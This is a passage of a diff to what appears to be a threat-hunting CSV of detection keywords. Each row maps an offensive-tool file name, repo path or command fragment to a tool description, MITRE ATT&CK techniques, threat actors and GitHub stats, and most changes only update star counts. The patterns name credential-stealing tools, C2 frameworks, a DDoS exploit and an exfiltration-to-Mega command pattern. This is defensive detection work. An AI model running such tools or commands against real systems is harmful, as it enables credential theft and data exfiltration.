Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*MattKeeley/Spoofy*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*MayankPandey01/Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*mbrg/power-pwn*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" -"*mcafee_epo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mcafee_epo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*McpManagementPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" -"*Md4-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Md5-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*mDNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Md4-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Md5-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mDNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*MDSDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MDSDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*mdsecactivebreach*","offensive_tool_keyword","Github Username","MDSecs ActiveBreach Team. own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mdsecactivebreach/CACTUSTORCH*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*mdsecactivebreach/Farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*med0x2e/GadgetToJScript*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" -"*med0x2e/SigFlip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*med0x2e/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*media_variable_file_cryptography.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*megacmd -conf * put *mega:*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*megadose/holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" -"*megadose@protonmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megadose/holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megadose@protonmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "*meliht/Mr.SIP*","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","4","366","100","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z" -"*Memcrashed-DDoS-Exploit*","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1278","493","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" +"*Memcrashed-DDoS-Exploit*","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1279","493","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" "*memfd implant *.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*memfd task *.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*memory*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*memory/onepassword.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*memorydump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memory*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memory/onepassword.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memorydump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*memreader *access_token*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "*MemReader_BoF.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" -"*merlin-*.zip*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*merlin-*.zip*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*Merlin_v0.1Beta.zip*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*merlinAgent-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*merlinAgent-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*merlinAgent-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - 